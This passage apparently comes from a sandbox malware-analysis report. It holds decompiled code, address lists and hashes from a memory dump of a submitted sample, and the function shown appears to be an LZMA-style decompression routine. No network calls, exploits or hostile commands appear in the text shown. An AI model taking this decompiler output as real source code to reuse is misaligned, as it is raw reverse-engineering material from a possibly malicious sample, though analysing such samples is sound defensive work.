                          							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          							 *( *(__ebp - 0x68)) = __al;
                          							__ecx =  *(__ebp - 0x14);
                          							 *(__ecx +  *(__ebp - 8)) = __al;
                          							__eax = __ecx + 1;
                          							__edx = 0;
                          							_t192 = __eax %  *(__ebp - 0x74);
                          							__eax = __eax /  *(__ebp - 0x74);
                          							__edx = _t192;
                          							goto L79;
                          						case 0x1b:
                          							goto L75;
                          						case 0x1c:
                          							while(1) {
                          								L123:
                          								__eflags =  *(__ebp - 0x64);
                          								if( *(__ebp - 0x64) == 0) {
                          									break;
                          								}
                          								__eax =  *(__ebp - 0x14);
                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          								__eflags = __eax -  *(__ebp - 0x74);
                          								if(__eax >=  *(__ebp - 0x74)) {
                          									__eax = __eax +  *(__ebp - 0x74);
                          									__eflags = __eax;
                          								}
                          								__edx =  *(__ebp - 8);
                          								__cl =  *(__eax + __edx);
                          								__eax =  *(__ebp - 0x14);
                          								 *(__ebp - 0x5c) = __cl;
                          								 *(__eax + __edx) = __cl;
                          								__eax = __eax + 1;
                          								__edx = 0;
                          								_t414 = __eax %  *(__ebp - 0x74);
                          								__eax = __eax /  *(__ebp - 0x74);
                          								__edx = _t414;
                          								__eax =  *(__ebp - 0x68);
                          								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          								__eflags =  *(__ebp - 0x30);
                          								 *( *(__ebp - 0x68)) = __cl;
                          								 *(__ebp - 0x14) = _t414;
                          								if( *(__ebp - 0x30) > 0) {
                          									continue;
                          								} else {
                          									goto L80;
                          								}
                          							}
                          							 *(__ebp - 0x88) = 0x1c;
                          							goto L170;
                          					}
                          				}
                          			}













                          0x00000000
                          0x00406f4a
                          0x00406f4a
                          0x00406f4e
                          0x00407005
                          0x00407008
                          0x00407014
                          0x00406ef5
                          0x00406ef5
                          0x00406ef8
                          0x0040726a
                          0x0040726a
                          0x0040726d
                          0x0040726d
                          0x00407273
                          0x00407279
                          0x0040727f
                          0x00407299
                          0x0040729c
                          0x004072a2
                          0x004072ad
                          0x004072af
                          0x00407281
                          0x00407281
                          0x00407290
                          0x00407294
                          0x00407294
                          0x004072b9
                          0x004072e0
                          0x004072e0
                          0x004072e6
                          0x004072e6
                          0x00000000
                          0x004072bb
                          0x004072bb
                          0x004072bf
                          0x0040746e
                          0x00000000
                          0x0040746e
                          0x004072cb
                          0x004072d2
                          0x004072da
                          0x004072dd
                          0x00000000
                          0x004072dd
                          0x00406f54
                          0x00406f58
                          0x00407499
                          0x00407499
                          0x0040749c
                          0x004074a0
                          0x004074a0
                          0x00406f5e
                          0x00406f64
                          0x00406f67
                          0x00406f6b
                          0x00406f6e
                          0x00406f72
                          0x00407438
                          0x00407484
                          0x0040748c
                          0x00407493
                          0x00407495
                          0x00000000
                          0x00407495
                          0x00406f78
                          0x00406f7b
                          0x00406f81
                          0x00406f83
                          0x00406f83
                          0x00406f86
                          0x00406f89
                          0x00406f8c
                          0x00406f8f
                          0x00406f92
                          0x00406f95
                          0x00406f96
                          0x00406f98
                          0x00406f98
                          0x00406f98
                          0x00406f9b
                          0x00406f9e
                          0x00406fa1
                          0x00406fa4
                          0x00406fa4
                          0x00406fa7
                          0x00406fa9
                          0x00406fa9
                          0x00406fac
                          0x00406fac
                          0x00406fac
                          0x00406a82
                          0x00406a82
                          0x00406a8b
                          0x00000000
                          0x00000000
                          0x00406a91
                          0x00000000
                          0x00406a9c
                          0x00000000
                          0x00000000
                          0x00406aa5
                          0x00406aa8
                          0x00406aab
                          0x00406aaf
                          0x00000000
                          0x00000000
                          0x00406ab5
                          0x00406ab8
                          0x00406aba
                          0x00406abb
                          0x00406abe
                          0x00406ac0
                          0x00406ac1
                          0x00406ac3
                          0x00406ac6
                          0x00406acb
                          0x00406ad0
                          0x00406ad9
                          0x00406aec
                          0x00406aef
                          0x00406afb
                          0x00406b23
                          0x00406b25
                          0x00406b33
                          0x00406b33
                          0x00406b37
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406b27
                          0x00406b27
                          0x00406b2a
                          0x00406b2b
                          0x00406b2b
                          0x00000000
                          0x00406b27
                          0x00406b01
                          0x00406b06
                          0x00406b06
                          0x00406b0f
                          0x00406b17
                          0x00406b1a
                          0x00000000
                          0x00406b20
                          0x00406b20
                          0x00000000
                          0x00406b20
                          0x00000000
                          0x00406b3d
                          0x00406b3d
                          0x00406b41
                          0x004073ed
                          0x00000000
                          0x004073ed
                          0x00406b4a
                          0x00406b5a
                          0x00406b5d
                          0x00406b60
                          0x00406b60
                          0x00406b60
                          0x00406b63
                          0x00406b67
                          0x00000000
                          0x00000000
                          0x00406b69
                          0x00406b6f
                          0x00406b99
                          0x00406b9f
                          0x00406ba6
                          0x00000000
                          0x00406ba6
                          0x00406b75
                          0x00406b78
                          0x00406b7d
                          0x00406b7d
                          0x00406b88
                          0x00406b90
                          0x00406b93
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406bd8
                          0x00406bde
                          0x00406be1
                          0x00406bee
                          0x00406bf6
                          0x00000000
                          0x00000000
                          0x00406bad
                          0x00406bad
                          0x00406bb1
                          0x004073fc
                          0x00000000
                          0x004073fc
                          0x00406bbd
                          0x00406bc8
                          0x00406bc8
                          0x00406bc8
                          0x00406bcb
                          0x00406bce
                          0x00406bd1
                          0x00406bd6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406bfe
                          0x00406c00
                          0x00406c03
                          0x00406c74
                          0x00406c77
                          0x00406c7a
                          0x00406c81
                          0x00406c8b
                          0x00000000
                          0x00406c8b
                          0x00406c05
                          0x00406c09
                          0x00406c0c
                          0x00406c0e
                          0x00406c11
                          0x00406c14
                          0x00406c16
                          0x00406c19
                          0x00406c1b
                          0x00406c20
                          0x00406c23
                          0x00406c26
                          0x00406c2a
                          0x00406c31
                          0x00406c34
                          0x00406c3b
                          0x00406c3f
                          0x00406c47
                          0x00406c47
                          0x00406c47
                          0x00406c41
                          0x00406c41
                          0x00406c41
                          0x00406c36
                          0x00406c36
                          0x00406c36
                          0x00406c4b
                          0x00406c4e
                          0x00406c6c
                          0x00406c6e
                          0x00000000
                          0x00406c50
                          0x00406c50
                          0x00406c53
                          0x00406c56
                          0x00406c59
                          0x00406c5b
                          0x00406c5b
                          0x00406c5b
                          0x00406c5e
                          0x00406c61
                          0x00406c63
                          0x00406c64
                          0x00406c67
                          0x00000000
                          0x00406c67
                          0x00000000
                          0x00406e9d
                          0x00406ea1
                          0x00406ebf
                          0x00406ec2
                          0x00406ec9
                          0x00406ecc
                          0x00406ecf
                          0x00406ed2
                          0x00406ed5
                          0x00406ed8
                          0x00406eda
                          0x00406ee1
                          0x00406ee2
                          0x00406ee4
                          0x00406ee7
                          0x00406eea
                          0x00406eed
                          0x00406eed
                          0x00406ef2
                          0x00000000
                          0x00406ef2
                          0x00406ea3
                          0x00406ea6
                          0x00406ea9
                          0x00406eb3
                          0x00000000
                          0x00000000
                          0x00406f07
                          0x00406f0b
                          0x00406f2e
                          0x00406f31
                          0x00406f34
                          0x00406f3e
                          0x00406f0d
                          0x00406f0d
                          0x00406f10
                          0x00406f13
                          0x00406f16
                          0x00406f23
                          0x00406f26
                          0x00406f26
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406fbb
                          0x00406fbf
                          0x00406fc6
                          0x00406fc9
                          0x00406fcc
                          0x00406fd6
                          0x00000000
                          0x00406fd6
                          0x00406fc1
                          0x00000000
                          0x00000000
                          0x00406fe2
                          0x00406fe6
                          0x00406fed
                          0x00406ff0
                          0x00406ff3
                          0x00406fe8
                          0x00406fe8
                          0x00406fe8
                          0x00406ff6
                          0x00406ff9
                          0x00406ffc
                          0x00406ffc
                          0x00406fff
                          0x00407002
                          0x00000000
                          0x00000000
                          0x004070a2
                          0x004070a2
                          0x004070a6
                          0x00407444
                          0x00000000
                          0x00407444
                          0x004070ac
                          0x004070af
                          0x004070b2
                          0x004070b6
                          0x004070b9
                          0x004070bf
                          0x004070c1
                          0x004070c1
                          0x004070c1
                          0x004070c4
                          0x004070c7
                          0x00000000
                          0x00000000
                          0x00406c97
                          0x00406c97
                          0x00406c9b
                          0x00407408
                          0x00000000
                          0x00407408
                          0x00406ca1
                          0x00406ca4
                          0x00406ca7
                          0x00406cab
                          0x00406cae
                          0x00406cb4
                          0x00406cb6
                          0x00406cb6
                          0x00406cb6
                          0x00406cb9
                          0x00406cbc
                          0x00406cbc
                          0x00406cbf
                          0x00406cc2
                          0x00000000
                          0x00000000
                          0x00406cc8
                          0x00406cce
                          0x00000000
                          0x00000000
                          0x00406cd4
                          0x00406cd4
                          0x00406cd8
                          0x00406cdb
                          0x00406cde
                          0x00406ce1
                          0x00406ce4
                          0x00406ce5
                          0x00406ce8
                          0x00406cea
                          0x00406cf0
                          0x00406cf3
                          0x00406cf6
                          0x00406cf9
                          0x00406cfc
                          0x00406cff
                          0x00406d02
                          0x00406d1e
                          0x00406d21
                          0x00406d24
                          0x00406d27
                          0x00406d2e
                          0x00406d32
                          0x00406d34
                          0x00406d38
                          0x00406d04
                          0x00406d04
                          0x00406d08
                          0x00406d10
                          0x00406d15
                          0x00406d17
                          0x00406d19
                          0x00406d19
                          0x00406d3b
                          0x00406d42
                          0x00406d45
                          0x00000000
                          0x00406d4b
                          0x00000000
                          0x00406d4b
                          0x00000000
                          0x00406d50
                          0x00406d50
                          0x00406d54
                          0x00407414
                          0x00000000
                          0x00407414
                          0x00406d5a
                          0x00406d5d
                          0x00406d60
                          0x00406d64
                          0x00406d67
                          0x00406d6d
                          0x00406d6f
                          0x00406d6f
                          0x00406d6f
                          0x00406d72
                          0x00406d75
                          0x00406d75
                          0x00406d75
                          0x00406d7b
                          0x00000000
                          0x00000000
                          0x00406d7d
                          0x00406d80
                          0x00406d83
                          0x00406d86
                          0x00406d89
                          0x00406d8c
                          0x00406d8f
                          0x00406d92
                          0x00406d95
                          0x00406d98
                          0x00406d9b
                          0x00406db3
                          0x00406db6
                          0x00406db9
                          0x00406dbc
                          0x00406dbc
                          0x00406dbf
                          0x00406dc3
                          0x00406dc5
                          0x00406d9d
                          0x00406d9d
                          0x00406da5
                          0x00406daa
                          0x00406dac
                          0x00406dae
                          0x00406dae
                          0x00406dc8
                          0x00406dcf
                          0x00406dd2
                          0x00000000
                          0x00406dd4
                          0x00000000
                          0x00406dd4
                          0x00406dd2
                          0x00406dd9
                          0x00406dd9
                          0x00406dd9
                          0x00406dd9
                          0x00000000
                          0x00000000
                          0x00406e14
                          0x00406e14
                          0x00406e18
                          0x00407420
                          0x00000000
                          0x00407420
                          0x00406e1e
                          0x00406e21
                          0x00406e24
                          0x00406e28
                          0x00406e2b
                          0x00406e31
                          0x00406e33
                          0x00406e33
                          0x00406e33
                          0x00406e36
                          0x00406e39
                          0x00406e39
                          0x00406e3f
                          0x00406ddd
                          0x00406ddd
                          0x00406de0
                          0x00000000
                          0x00406de0
                          0x00406e41
                          0x00406e41
                          0x00406e44
                          0x00406e47
                          0x00406e4a
                          0x00406e4d
                          0x00406e50
                          0x00406e53
                          0x00406e56
                          0x00406e59
                          0x00406e5c
                          0x00406e5f
                          0x00406e77
                          0x00406e7a
                          0x00406e7d
                          0x00406e80
                          0x00406e80
                          0x00406e83
                          0x00406e87
                          0x00406e89
                          0x00406e61
                          0x00406e61
                          0x00406e69
                          0x00406e6e
                          0x00406e70
                          0x00406e72
                          0x00406e72
                          0x00406e8c
                          0x00406e93
                          0x00406e96
                          0x00000000
                          0x00406e98
                          0x00000000
                          0x00406e98
                          0x00000000
                          0x00407125
                          0x00407125
                          0x00407129
                          0x00407450
                          0x00000000
                          0x00407450
                          0x0040712f
                          0x00407132
                          0x00407135
                          0x00407139
                          0x0040713c
                          0x00407142
                          0x00407144
                          0x00407144
                          0x00407144
                          0x00407147
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00407234
                          0x00407238
                          0x0040725a
                          0x0040725d
                          0x00407267
                          0x00000000
                          0x00407267
                          0x0040723a
                          0x0040723d
                          0x00407241
                          0x00407244
                          0x00407244
                          0x00407247
                          0x00000000
                          0x00000000
                          0x004072f1
                          0x004072f5
                          0x00407313
                          0x00407313
                          0x00407313
                          0x0040731a
                          0x00407321
                          0x00407328
                          0x00407328
                          0x00000000
                          0x00407328
                          0x004072f7
                          0x004072fa
                          0x004072fd
                          0x00407300
                          0x00407307
                          0x0040724b
                          0x0040724b
                          0x0040724e
                          0x00000000
                          0x00000000
                          0x004073e2
                          0x004073e5
                          0x00000000
                          0x00000000
                          0x0040701c
                          0x0040701e
                          0x00407025
                          0x00407026
                          0x00407028
                          0x0040702b
                          0x00000000
                          0x00000000
                          0x00407033
                          0x00407036
                          0x00407039
                          0x0040703b
                          0x0040703d
                          0x0040703d
                          0x0040703e
                          0x00407041
                          0x00407048
                          0x0040704b
                          0x00407059
                          0x00000000
                          0x00000000
                          0x0040732f
                          0x0040732f
                          0x00407332
                          0x00407339
                          0x00000000
                          0x00000000
                          0x0040733e
                          0x0040733e
                          0x00407342
                          0x0040747a
                          0x00000000
                          0x0040747a
                          0x00407348
                          0x0040734b
                          0x0040734e
                          0x00407352
                          0x00407355
                          0x0040735b
                          0x0040735d
                          0x0040735d
                          0x0040735d
                          0x00407360
                          0x00407363
                          0x00407363
                          0x00407363
                          0x00407363
                          0x00407366
                          0x00407366
                          0x0040736a
                          0x004073ca
                          0x004073cd
                          0x004073d2
                          0x004073d3
                          0x004073d5
                          0x004073d7
                          0x004073da
                          0x00000000
                          0x004073da
                          0x0040736c
                          0x00407372
                          0x00407375
                          0x00407378
                          0x0040737b
                          0x0040737e
                          0x00407381
                          0x00407384
                          0x00407387
                          0x0040738a
                          0x0040738d
                          0x004073a6
                          0x004073a9
                          0x004073ac
                          0x004073af
                          0x004073b3
                          0x004073b5
                          0x004073b5
                          0x004073b6
                          0x004073b9
                          0x0040738f
                          0x0040738f
                          0x00407397
                          0x0040739c
                          0x0040739e
                          0x004073a1
                          0x004073a1
                          0x004073bc
                          0x004073c3
                          0x00000000
                          0x004073c5
                          0x00000000
                          0x004073c5
                          0x00000000
                          0x00407061
                          0x00407064
                          0x0040709a
                          0x004071ca
                          0x004071ca
                          0x004071ca
                          0x004071ca
                          0x004071cd
                          0x004071cd
                          0x004071d0
                          0x004071d2
                          0x0040745c
                          0x00000000
                          0x0040745c
                          0x004071d8
                          0x004071db
                          0x00000000
                          0x00000000
                          0x004071e1
                          0x004071e5
                          0x004071e8
                          0x004071e8
                          0x004071e8
                          0x00000000
                          0x004071e8
                          0x00407066
                          0x00407068
                          0x0040706a
                          0x0040706c
                          0x0040706f
                          0x00407070
                          0x00407072
                          0x00407074
                          0x00407077
                          0x0040707a
                          0x00407090
                          0x00407095
                          0x004070cd
                          0x004070cd
                          0x004070d1
                          0x004070fd
                          0x004070ff
                          0x00407106
                          0x00407109
                          0x0040710c
                          0x0040710c
                          0x00407111
                          0x00407111
                          0x00407113
                          0x00407116
                          0x0040711d
                          0x00407120
                          0x0040714d
                          0x0040714d
                          0x00407150
                          0x00407153
                          0x004071c7
                          0x004071c7
                          0x004071c7
                          0x00000000
                          0x004071c7
                          0x00407155
                          0x0040715b
                          0x0040715e
                          0x00407161
                          0x00407164
                          0x00407167
                          0x0040716a
                          0x0040716d
                          0x00407170
                          0x00407173
                          0x00407176
                          0x0040718f
                          0x00407191
                          0x00407194
                          0x00407195
                          0x00407198
                          0x0040719a
                          0x0040719d
                          0x0040719f
                          0x004071a1
                          0x004071a4
                          0x004071a6
                          0x004071a9
                          0x004071ad
                          0x004071af
                          0x004071af
                          0x004071b0
                          0x004071b3
                          0x004071b6
                          0x00407178
                          0x00407178
                          0x00407180
                          0x00407185
                          0x00407187
                          0x0040718a
                          0x0040718a
                          0x004071b9
                          0x004071c0
                          0x0040714a
                          0x0040714a
                          0x0040714a
                          0x0040714a
                          0x00000000
                          0x004071c2
                          0x00000000
                          0x004071c2
                          0x004071c0
                          0x004070d3
                          0x004070d6
                          0x004070d8
                          0x004070db
                          0x004070de
                          0x004070e1
                          0x004070e3
                          0x004070e6
                          0x004070e9
                          0x004070e9
                          0x004070ec
                          0x004070ec
                          0x004070ef
                          0x004070f6
                          0x004070ca
                          0x004070ca
                          0x004070ca
                          0x004070ca
                          0x00000000
                          0x004070f8
                          0x00000000
                          0x004070f8
                          0x004070f6
                          0x0040707c
                          0x0040707f
                          0x00407081
                          0x00407084
                          0x00000000
                          0x00000000
                          0x00406de3
                          0x00406de3
                          0x00406de7
                          0x0040742c
                          0x00000000
                          0x0040742c
                          0x00406ded
                          0x00406df0
                          0x00406df3
                          0x00406df6
                          0x00406df9
                          0x00406dfc
                          0x00406dff
                          0x00406e01
                          0x00406e04
                          0x00406e07
                          0x00406e0a
                          0x00406e0c
                          0x00406e0c
                          0x00406e0c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004071eb
                          0x004071eb
                          0x004071eb
                          0x004071ef
                          0x00000000
                          0x00000000
                          0x004071f5
                          0x004071f8
                          0x004071fb
                          0x004071fe
                          0x00407200
                          0x00407200
                          0x00407200
                          0x00407203
                          0x00407206
                          0x00407209
                          0x0040720c
                          0x0040720f
                          0x00407212
                          0x00407213
                          0x00407215
                          0x00407215
                          0x00407215
                          0x00407218
                          0x0040721b
                          0x0040721e
                          0x00407221
                          0x00407224
                          0x00407228
                          0x0040722a
                          0x0040722d
                          0x00000000
                          0x0040722f
                          0x00000000
                          0x0040722f
                          0x0040722d
                          0x00407462
                          0x00000000
                          0x00000000
                          0x00406a91

                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                          • Instruction ID: 00773887ea3243dfb52df8404d42644f62a25abb174058b9e5a1e26f950428c6
                          • Opcode Fuzzy Hash: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                          • Instruction Fuzzy Hash: 27813671D04229CFDF24CFA8C8847ADBBB1FB44305F24816AD856BB281C7786A86DF55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00406A4F(void* __ecx) {
                          				void* _v8;
                          				void* _v12;
                          				signed int _v16;
                          				unsigned int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				signed int _v44;
                          				signed int _v48;
                          				signed int _v52;
                          				signed int _v56;
                          				signed int _v60;
                          				signed int _v64;
                          				signed int _v68;
                          				signed int _v72;
                          				signed int _v76;
                          				signed int _v80;
                          				signed int _v84;
                          				signed int _v88;
                          				signed int _v92;
                          				signed int _v95;
                          				signed int _v96;
                          				signed int _v100;
                          				signed int _v104;
                          				signed int _v108;
                          				signed int _v112;
                          				signed int _v116;
                          				signed int _v120;
                          				intOrPtr _v124;
                          				signed int _v128;
                          				signed int _v132;
                          				signed int _v136;
                          				void _v140;
                          				void* _v148;
                          				signed int _t537;
                          				signed int _t538;
                          				signed int _t572;
                          
                          				_t572 = 0x22;
                          				_v148 = __ecx;
                          				memcpy( &_v140, __ecx, _t572 << 2);
                          				if(_v52 == 0xffffffff) {
                          					return 1;
                          				}
                          				while(1) {
                          					L3:
                          					_t537 = _v140;
                          					if(_t537 > 0x1c) {
                          						break;
                          					}
                          					switch( *((intOrPtr*)(_t537 * 4 +  &M004074A1))) {
                          						case 0:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								goto L173;
                          							}
                          							_v112 = _v112 - 1;
                          							_v116 = _v116 + 1;
                          							_t537 =  *_v116;
                          							__eflags = _t537 - 0xe1;
                          							if(_t537 > 0xe1) {
                          								goto L174;
                          							}
                          							_t542 = _t537 & 0x000000ff;
                          							_push(0x2d);
                          							asm("cdq");
                          							_pop(_t576);
                          							_push(9);
                          							_pop(_t577);
                          							_t622 = _t542 / _t576;
                          							_t544 = _t542 % _t576 & 0x000000ff;
                          							asm("cdq");
                          							_t617 = _t544 % _t577 & 0x000000ff;
                          							_v64 = _t617;
                          							_v32 = (1 << _t622) - 1;
                          							_v28 = (1 << _t544 / _t577) - 1;
                          							_t625 = (0x300 << _t617 + _t622) + 0x736;
                          							__eflags = 0x600 - _v124;
                          							if(0x600 == _v124) {
                          								L12:
                          								__eflags = _t625;
                          								if(_t625 == 0) {
                          									L14:
                          									_v76 = _v76 & 0x00000000;
                          									_v68 = _v68 & 0x00000000;
                          									goto L17;
                          								} else {
                          									goto L13;
                          								}
                          								do {
                          									L13:
                          									_t625 = _t625 - 1;
                          									__eflags = _t625;
                          									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                          								} while (_t625 != 0);
                          								goto L14;
                          							}
                          							__eflags = _v8;
                          							if(_v8 != 0) {
                          								GlobalFree(_v8);
                          							}
                          							_t537 = GlobalAlloc(0x40, 0x600); // executed
                          							__eflags = _t537;
                          							_v8 = _t537;
                          							if(_t537 == 0) {
                          								goto L174;
                          							} else {
                          								_v124 = 0x600;
                          								goto L12;
                          							}
                          						case 1:
                          							L15:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 1;
                          								goto L173;
                          							}
                          							_v112 = _v112 - 1;
                          							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                          							_v116 = _v116 + 1;
                          							_t50 =  &_v76;
                          							 *_t50 = _v76 + 1;
                          							__eflags =  *_t50;
                          							L17:
                          							__eflags = _v76 - 4;
                          							if(_v76 < 4) {
                          								goto L15;
                          							}
                          							_t550 = _v68;
                          							__eflags = _t550 - _v120;
                          							if(_t550 == _v120) {
                          								L22:
                          								_v76 = 5;
                          								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                          								goto L25;
                          							}
                          							__eflags = _v12;
                          							_v120 = _t550;
                          							if(_v12 != 0) {
                          								GlobalFree(_v12); // executed
                          							}
                          							_t537 = GlobalAlloc(0x40, _v68); // executed
                          							__eflags = _t537;
                          							_v12 = _t537;
                          							if(_t537 == 0) {
                          								goto L174;
                          							} else {
                          								goto L22;
                          							}
                          						case 2:
                          							L26:
                          							_t557 = _v100 & _v32;
                          							_v136 = 6;
                          							_v80 = _t557;
                          							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                          							goto L135;
                          						case 3:
                          							L23:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 3;
                          								goto L173;
                          							}
                          							_v112 = _v112 - 1;
                          							_t72 =  &_v116;
                          							 *_t72 = _v116 + 1;
                          							__eflags =  *_t72;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							L25:
                          							_v76 = _v76 - 1;
                          							__eflags = _v76;
                          							if(_v76 != 0) {
                          								goto L23;
                          							}
                          							goto L26;
                          						case 4:
                          							L136:
                          							_t559 =  *_t626;
                          							_t610 = _t559 & 0x0000ffff;
                          							_t591 = (_v20 >> 0xb) * _t610;
                          							__eflags = _v16 - _t591;
                          							if(_v16 >= _t591) {
                          								_v20 = _v20 - _t591;
                          								_v16 = _v16 - _t591;
                          								_v68 = 1;
                          								_t560 = _t559 - (_t559 >> 5);
                          								__eflags = _t560;
                          								 *_t626 = _t560;
                          							} else {
                          								_v20 = _t591;
                          								_v68 = _v68 & 0x00000000;
                          								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                          							}
                          							__eflags = _v20 - 0x1000000;
                          							if(_v20 >= 0x1000000) {
                          								goto L142;
                          							} else {
                          								goto L140;
                          							}
                          						case 5:
                          							L140:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 5;
                          								goto L173;
                          							}
                          							_v20 = _v20 << 8;
                          							_v112 = _v112 - 1;
                          							_t464 =  &_v116;
                          							 *_t464 = _v116 + 1;
                          							__eflags =  *_t464;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							L142:
                          							_t561 = _v136;
                          							goto L143;
                          						case 6:
                          							__edx = 0;
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								__eax = _v8;
                          								__ecx = _v60;
                          								_v56 = 1;
                          								_v136 = 7;
                          								__esi = _v8 + 0x180 + _v60 * 2;
                          								goto L135;
                          							}
                          							__eax = _v96 & 0x000000ff;
                          							__esi = _v100;
                          							__cl = 8;
                          							__cl = 8 - _v64;
                          							__esi = _v100 & _v28;
                          							__eax = (_v96 & 0x000000ff) >> 8;
                          							__ecx = _v64;
                          							__esi = (_v100 & _v28) << 8;
                          							__ecx = _v8;
                          							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                          							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                          							__eflags = _v60 - 4;
                          							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                          							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                          							if(_v60 >= 4) {
                          								__eflags = _v60 - 0xa;
                          								if(_v60 >= 0xa) {
                          									_t103 =  &_v60;
                          									 *_t103 = _v60 - 6;
                          									__eflags =  *_t103;
                          								} else {
                          									_v60 = _v60 - 3;
                          								}
                          							} else {
                          								_v60 = 0;
                          							}
                          							__eflags = _v56 - __edx;
                          							if(_v56 == __edx) {
                          								__ebx = 0;
                          								__ebx = 1;
                          								goto L63;
                          							}
                          							__eax = _v24;
                          							__eax = _v24 - _v48;
                          							__eflags = __eax - _v120;
                          							if(__eax >= _v120) {
                          								__eax = __eax + _v120;
                          								__eflags = __eax;
                          							}
                          							__ecx = _v12;
                          							__ebx = 0;
                          							__ebx = 1;
                          							__al =  *((intOrPtr*)(__eax + __ecx));
                          							_v95 =  *((intOrPtr*)(__eax + __ecx));
                          							goto L43;
                          						case 7:
                          							__eflags = _v68 - 1;
                          							if(_v68 != 1) {
                          								__eax = _v40;
                          								_v132 = 0x16;
                          								_v36 = _v40;
                          								__eax = _v44;
                          								_v40 = _v44;
                          								__eax = _v48;
                          								_v44 = _v48;
                          								__eax = 0;
                          								__eflags = _v60 - 7;
                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          								__al = __al & 0x000000fd;
                          								__eax = (__eflags >= 0) - 1 + 0xa;
                          								_v60 = (__eflags >= 0) - 1 + 0xa;
                          								__eax = _v8;
                          								__eax = _v8 + 0x664;
                          								__eflags = __eax;
                          								_v92 = __eax;
                          								goto L71;
                          							}
                          							__eax = _v8;
                          							__ecx = _v60;
                          							_v136 = 8;
                          							__esi = _v8 + 0x198 + _v60 * 2;
                          							goto L135;
                          						case 8:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								__eax = _v8;
                          								__ecx = _v60;
                          								_v136 = 0xa;
                          								__esi = _v8 + 0x1b0 + _v60 * 2;
                          							} else {
                          								__eax = _v60;
                          								__ecx = _v8;
                          								__eax = _v60 + 0xf;
                          								_v136 = 9;
                          								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                          								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                          							}
                          							goto L135;
                          						case 9:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								goto L92;
                          							}
                          							__eflags = _v100;
                          							if(_v100 == 0) {
                          								goto L174;
                          							}
                          							__eax = 0;
                          							__eflags = _v60 - 7;
                          							_t264 = _v60 - 7 >= 0;
                          							__eflags = _t264;
                          							0 | _t264 = _t264 + _t264 + 9;
                          							_v60 = _t264 + _t264 + 9;
                          							goto L78;
                          						case 0xa:
                          							__eflags = _v68;
